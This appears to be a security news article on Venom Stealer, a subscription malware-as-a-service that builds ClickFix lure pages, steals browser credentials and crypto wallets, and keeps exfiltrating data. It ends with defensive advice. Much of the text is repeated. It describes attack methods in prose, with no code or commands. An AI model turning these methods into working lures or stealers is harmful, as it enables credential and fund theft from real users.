A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks.
Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found.
A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running."
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per-operator from the web panel.
Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvests credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report.
Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. So far in the month of March alone, its developer has already shipped multiple updates to the platform.
"Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.
Windows payloads available in the kit include .exe, .psi (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command.
Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added.
"All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult."
"Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote.
And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome’s Login Data, capturing newly saved credentials in real-time, he added.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult."
Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised.
"Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found.
A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running."
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per-operator from the web panel.
Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvests credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report.
Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. So far in the month of March alone, its developer has already shipped multiple updates to the platform.
Step-By-Step ClickFix by Design
An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four templates per platform (Windows and macOS), a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, copy and paste a command, and hit Enter."Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.
Windows payloads available in the kit include .exe, .psi (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command.
Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added.
"All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult."
Persistent Data-Theft Pipeline
The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer also added a File Password and Seed Finder, which search the filesystem for locally saved seed phrases, feeding anything found into the cracking pipeline."Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote.
And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome’s Login Data, capturing newly saved credentials in real-time, he added.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult."
How to Reduce ClickFix Exposure
Researchers from Proofpoint first spotted ClickFix attacks about two years ago, and the technique has taken off with the cybercriminal community since then. The attack instills urgency among targets by telling them something is wrong that they must fix or update, and then uses otherwise benign CAPTCHA-style prompts to lure them into a false sense of security. The aim is to trick a user into executing malicious prompts against themselves.Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised.
"Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."